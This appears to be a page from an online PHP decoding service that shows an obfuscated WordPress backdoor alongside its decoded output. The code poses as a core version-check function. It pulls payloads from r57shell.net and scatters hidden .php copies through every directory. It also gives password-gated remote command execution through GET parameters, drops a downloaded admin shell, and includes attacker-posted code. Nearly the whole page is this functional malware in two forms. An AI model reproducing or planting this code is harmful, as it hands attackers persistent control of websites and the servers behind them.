Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$stt1 = eval('?>'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));?> <?php $stt..
Decoded Output download
<? $stt1 = eval('?>'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));?>
<?php
$stt0 =
if
(!function_exists("wp_core_version_check")) {
function
wp_core_version_check() {
goto
QHTmE; ReBbR: $file_path = dirname($document_file);
goto
yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"];
goto
TmK7C; B8IHf: $uri_path = $parse_url["path"];
goto
DR8d0; TmK7C: $request_uri = $_SERVER["REQUEST_URI"];
goto
Lhccs; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]);
goto
EmUwt; yxZ6i: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
goto
TMxaR; O4NxR:
if
(!file_exists($tmp_file)) {
goto
Jjyr3; qVUcF: @touch($tmp_file);
goto
FrbfO; FrbfO: @file_put_contents($tmp_file, $response);
goto
fUkP_; Jjyr3:
if
(function_exists("curl_init")) {
goto
EZy_9; EZy_9: $ch = curl_init();
goto
VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
goto
OFlqh; DcJlW: $response = curl_exec($ch);
goto
fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
goto
DcJlW; fkRwe: curl_close($ch);
goto
MpMm6; MpMm6: }
else
{
goto
Rsl9q; PQRsR: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
goto
NXRla; DmscO: $context = stream_context_create($opts);
goto
PQRsR; Rsl9q: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
goto
vGpwe; vGpwe: $opts =
array
("http" =>
array
("header" =>
array
("Referer: {$referer}
\xa")));
goto
DmscO; NXRla: }
goto
qVUcF; fUkP_: }
else
{ $response = file_get_contents($tmp_file);
if
(!@preg_match("#stt1#", $response)) {
goto
Mh1sz; Mh1sz:
if
(function_exists("curl_init")) {
goto
DVDkP; u_SFh: $response = curl_exec($ch);
goto
zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
goto
AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
goto
u_SFh; DVDkP: $ch = curl_init();
goto
zMTgu; zDHcZ: curl_close($ch);
goto
v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
YWAQw; v98go: }
else
{
goto
JGb71; Npbn0: $opts =
array
("http" =>
array
("header" =>
array
("Referer: {$referer}
\xa")));
goto
dtUcU; JGb71: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
goto
Npbn0; hCspz: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
goto
XWjW4; dtUcU: $context = stream_context_create($opts);
goto
hCspz; XWjW4: }
goto
zkCQa; zkCQa: @touch($tmp_file);
goto
RL2uX; RL2uX: @file_put_contents($tmp_file, $response);
goto
Fx07H; Fx07H: } }
goto
BXZRC; EmUwt:
if
(is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); }
else
{ $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); }
goto
jUXuO; DR8d0: $uri_path = dirname($uri_path);
goto
ReBbR; QCYq2:
foreach
($dirs
as
$d) {
goto
DpqP9; eMOLH: @file_put_contents($file_name, $response);
goto
xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
goto
KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
goto
eMOLH; KHsZ5:
foreach
($dirs
as
$d) {
if
(!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } }
goto
vTd8M; vTd8M: }
goto
VCwm6; jUXuO:
if
(@$_GET["slince_golden"]) {
goto
qhIqa; v6_uU:
if
(md5(sha1(@$_GET["is"])) == $response) {
goto
LNCgX; LNCgX:
if
(@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); }
goto
mNwUE; mNwUE:
if
(@$_GET["m"]) {
goto
u3lO9; u3lO9:
if
(function_exists("curl_init")) {
goto
h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
goto
SlTBv; SMEF2: curl_close($ch);
goto
nxTNz; h0059: $ch = curl_init();
goto
nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
cerjF; cerjF: $response = curl_exec($ch);
goto
SMEF2; nxTNz: }
else
{ $response = file_get_contents("http://r57shell.net/mini_admin.txt"); }
goto
VIyGz; oeY1g:
echo
$file_name_path;
goto
UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.php";
goto
xhRaG; xhRaG: @file_put_contents($file_name_path, $response);
goto
oeY1g; UXu2c: }
goto
jKG5A; jKG5A:
if
(@$_POST["l"]) {
function
basic_code_extensions($request) {
goto
JTclu; tgcIK: $tmpf = $tmpf["uri"];
goto
z3rep; vnQ75: $ret = (
include
$tmpf);
goto
Cvaad; JTclu: $tmp = tmpfile();
goto
ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp);
goto
tgcIK; z3rep: fwrite($tmp, $request);
goto
vnQ75; aY2Ix:
return
$ret;
goto
hdvh2; Cvaad: fclose($tmp);
goto
aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); }
goto
ZFcwP; ZFcwP: }
goto
OlWFN; OlWFN:
exit
;
goto
vQOuT; qhIqa:
echo
"<!-- //Silence is golden. -->";
goto
q9t4S; q9t4S:
if
(function_exists("curl_init")) {
goto
P3bql; sk_2w: curl_close($ch);
goto
j1BU_; P3bql: $ch = curl_init();
goto
FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
goto
XAilZ; AJz_6: $response = curl_exec($ch);
goto
sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
AJz_6; j1BU_: }
else
{ $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); }
goto
v6_uU; vQOuT: }
goto
O4NxR; TMxaR:
if
($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; }
else
{ $document_root = str_replace($uri_path, '', $file_path); }
goto
Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
goto
QCYq2; Lhccs: $parse_url = parse_url($request_uri);
goto
B8IHf; VCwm6: } wp_core_version_check(); } ?>Did this file decode correctly?
Original Code
$stt1 = eval('?>'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));?>
<?php
$stt0 =
if
(!function_exists("\x77\160\137\143\x6f\x72\145\x5f\166\145\162\163\151\x6f\x6e\x5f\143\150\x65\x63\x6b")) {
function
wp_core_version_check() {
goto
QHTmE; ReBbR: $file_path = dirname($document_file);
goto
yxZ6i; QHTmE: $document_file = $_SERVER["\123\x43\x52\111\x50\124\x5f\106\111\114\x45\x4e\x41\115\105"];
goto
TmK7C; B8IHf: $uri_path = $parse_url["\x70\x61\x74\150"];
goto
DR8d0; TmK7C: $request_uri = $_SERVER["\x52\105\x51\x55\105\123\124\x5f\x55\122\x49"];
goto
Lhccs; Sae33: $hostname = str_replace("\167\167\x77\56", '', $_SERVER["\110\124\x54\120\137\x48\x4f\x53\x54"]);
goto
EmUwt; yxZ6i: $uri_path = str_replace("\x2f", DIRECTORY_SEPARATOR, $uri_path);
goto
TMxaR; O4NxR:
if
(!file_exists($tmp_file)) {
goto
Jjyr3; qVUcF: @touch($tmp_file);
goto
FrbfO; FrbfO: @file_put_contents($tmp_file, $response);
goto
fUkP_; Jjyr3:
if
(function_exists("\143\165\162\154\137\x69\x6e\x69\x74")) {
goto
EZy_9; EZy_9: $ch = curl_init();
goto
VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\160\72\57\x2f\x72\x35\67\163\x68\145\x6c\154\x2e\156\x65\164\x2f\152\161\165\x65\162\x79\x2e\160\150\160\77\x76\75\61\x2e\x32\x26\x72\145\161\x75\x65\163\x74\75\145\156\141\142\x6c\x65");
goto
OFlqh; DcJlW: $response = curl_exec($ch);
goto
fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\110\124\124\x50\x5f\x48\x4f\x53\124"] . $_SERVER["\x52\105\x51\x55\x45\x53\x54\137\x55\x52\111"]);
goto
DcJlW; fkRwe: curl_close($ch);
goto
MpMm6; MpMm6: }
else
{
goto
Rsl9q; PQRsR: $response = @file_get_contents("\150\x74\x74\x70\x3a\x2f\57\162\x35\67\163\150\145\x6c\x6c\x2e\x6e\x65\164\x2f\152\161\165\145\162\171\x2e\x70\x68\160\77\166\75\x31\56\62\46\x72\145\161\165\145\163\x74\x3d\x65\x6e\141\142\154\145", false, $context);
goto
NXRla; DmscO: $context = stream_context_create($opts);
goto
PQRsR; Rsl9q: $referer = $_SERVER["\110\x54\124\x50\x5f\x48\x4f\123\124"] . $_SERVER["\x52\x45\x51\x55\105\123\124\x5f\x55\122\111"];
goto
vGpwe; vGpwe: $opts =
array
("\150\x74\164\160" =>
array
("\x68\x65\141\144\145\162" =>
array
("\122\x65\x66\x65\x72\x65\162\72\40{$referer}\15\xa")));
goto
DmscO; NXRla: }
goto
qVUcF; fUkP_: }
else
{ $response = file_get_contents($tmp_file);
if
(!@preg_match("\43\163\164\x74\61\x23", $response)) {
goto
Mh1sz; Mh1sz:
if
(function_exists("\143\x75\162\154\137\151\156\x69\164")) {
goto
DVDkP; u_SFh: $response = curl_exec($ch);
goto
zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\72\x2f\57\x72\65\67\163\x68\145\154\154\56\156\x65\164\x2f\x6a\x71\165\x65\x72\x79\56\160\150\x70\77\166\75\61\56\x32\x26\162\145\161\165\145\x73\x74\x3d\145\x6e\x61\142\x6c\x65");
goto
AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\x48\124\124\120\137\110\x4f\x53\124"] . $_SERVER["\122\105\x51\x55\105\x53\124\x5f\x55\122\111"]);
goto
u_SFh; DVDkP: $ch = curl_init();
goto
zMTgu; zDHcZ: curl_close($ch);
goto
v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
YWAQw; v98go: }
else
{
goto
JGb71; Npbn0: $opts =
array
("\150\164\164\160" =>
array
("\150\145\141\x64\145\x72" =>
array
("\122\145\146\145\162\145\162\72\40{$referer}\15\xa")));
goto
dtUcU; JGb71: $referer = $_SERVER["\110\124\124\x50\137\x48\x4f\x53\x54"] . $_SERVER["\122\x45\121\125\105\x53\x54\x5f\125\x52\111"];
goto
Npbn0; hCspz: $response = @file_get_contents("\150\x74\x74\x70\72\57\57\162\x35\x37\x73\x68\145\154\x6c\56\156\x65\164\x2f\x6a\161\x75\145\x72\171\56\160\x68\x70\77\x76\75\x31\56\62\46\x72\x65\161\x75\145\x73\164\75\x65\156\x61\x62\154\145", false, $context);
goto
XWjW4; dtUcU: $context = stream_context_create($opts);
goto
hCspz; XWjW4: }
goto
zkCQa; zkCQa: @touch($tmp_file);
goto
RL2uX; RL2uX: @file_put_contents($tmp_file, $response);
goto
Fx07H; Fx07H: } }
goto
BXZRC; EmUwt:
if
(is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "\x73\145\x73\163\x5f" . md5('' . $hostname . "\x5f" . $document_file . ''); }
else
{ $tmp_file = $file_path . DIRECTORY_SEPARATOR . "\163\x65\163\163\137" . md5('' . $hostname . "\x5f" . $document_file . ''); }
goto
jUXuO; DR8d0: $uri_path = dirname($uri_path);
goto
ReBbR; QCYq2:
foreach
($dirs
as
$d) {
goto
DpqP9; eMOLH: @file_put_contents($file_name, $response);
goto
xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR));
goto
KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "\x2e" . basename($d) . "\56\160\150\160";
goto
eMOLH; KHsZ5:
foreach
($dirs
as
$d) {
if
(!@preg_match("\43\167\x70\55\x63\157\x6e\x74\145\x6e\x74\43", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "\56" . basename($d) . "\56\x70\x68\160"; @file_put_contents($file_name, $response); } }
goto
vTd8M; vTd8M: }
goto
VCwm6; jUXuO:
if
(@$_GET["\163\x6c\x69\156\x63\145\x5f\x67\x6f\154\144\x65\x6e"]) {
goto
qhIqa; v6_uU:
if
(md5(sha1(@$_GET["\151\163"])) == $response) {
goto
LNCgX; LNCgX:
if
(@$_GET["\146"]) { print_r($_GET["\x66"]($_GET["\x63"])); }
goto
mNwUE; mNwUE:
if
(@$_GET["\x6d"]) {
goto
u3lO9; u3lO9:
if
(function_exists("\x63\x75\162\154\x5f\151\x6e\x69\x74")) {
goto
h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\72\57\x2f\x72\x35\67\x73\x68\x65\x6c\x6c\56\156\x65\x74\x2f\155\151\x6e\151\137\141\144\155\151\x6e\56\164\x78\164");
goto
SlTBv; SMEF2: curl_close($ch);
goto
nxTNz; h0059: $ch = curl_init();
goto
nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
cerjF; cerjF: $response = curl_exec($ch);
goto
SMEF2; nxTNz: }
else
{ $response = file_get_contents("\x68\x74\x74\160\x3a\57\57\162\65\67\163\x68\145\154\154\56\156\x65\x74\x2f\x6d\151\x6e\x69\137\141\144\155\151\x6e\x2e\x74\x78\164"); }
goto
VIyGz; oeY1g:
echo
$file_name_path;
goto
UXu2c; VIyGz: $file_name_path = @$_GET["\155"] . "\147\x61\x67\141\154\x2e\x70\150\160";
goto
xhRaG; xhRaG: @file_put_contents($file_name_path, $response);
goto
oeY1g; UXu2c: }
goto
jKG5A; jKG5A:
if
(@$_POST["\x6c"]) {
function
basic_code_extensions($request) {
goto
JTclu; tgcIK: $tmpf = $tmpf["\165\x72\x69"];
goto
z3rep; vnQ75: $ret = (
include
$tmpf);
goto
Cvaad; JTclu: $tmp = tmpfile();
goto
ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp);
goto
tgcIK; z3rep: fwrite($tmp, $request);
goto
vnQ75; aY2Ix:
return
$ret;
goto
hdvh2; Cvaad: fclose($tmp);
goto
aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["\154"])); }
goto
ZFcwP; ZFcwP: }
goto
OlWFN; OlWFN:
exit
;
goto
vQOuT; qhIqa:
echo
"\74\41\x2d\55\40\x2f\57\123\x69\154\145\156\x63\145\40\151\x73\x20\147\157\154\144\x65\x6e\56\x20\55\x2d\x3e";
goto
q9t4S; q9t4S:
if
(function_exists("\x63\165\162\154\x5f\x69\156\x69\164")) {
goto
P3bql; sk_2w: curl_close($ch);
goto
j1BU_; P3bql: $ch = curl_init();
goto
FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "\150\x74\164\160\72\x2f\57\162\65\x37\x73\150\145\x6c\x6c\56\x6e\145\164\57\x6a\x71\165\x65\162\x79\56\160\150\x70\77\x76\x3d\61\x2e\x32\46\160\167\x64\75\x67\x65\x74");
goto
XAilZ; AJz_6: $response = curl_exec($ch);
goto
sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto
AJz_6; j1BU_: }
else
{ $response = file_get_contents("\150\164\x74\160\72\x2f\57\x72\x35\x37\x73\150\x65\154\x6c\56\x6e\145\164\x2f\152\161\x75\145\162\171\56\x70\150\x70\77\166\x3d\61\x2e\x32\46\x70\167\144\x3d\x67\145\x74"); }
goto
v6_uU; vQOuT: }
goto
O4NxR; TMxaR:
if
($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; }
else
{ $document_root = str_replace($uri_path, '', $file_path); }
goto
Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR));
goto
QCYq2; Lhccs: $parse_url = parse_url($request_uri);
goto
B8IHf; VCwm6: } wp_core_version_check(); }Function Calls
| None |
Stats
| MD5 | 185f2811137f42498ae770af5c77a38a |
| Eval Count | 0 |
| Decode Time | 54 ms |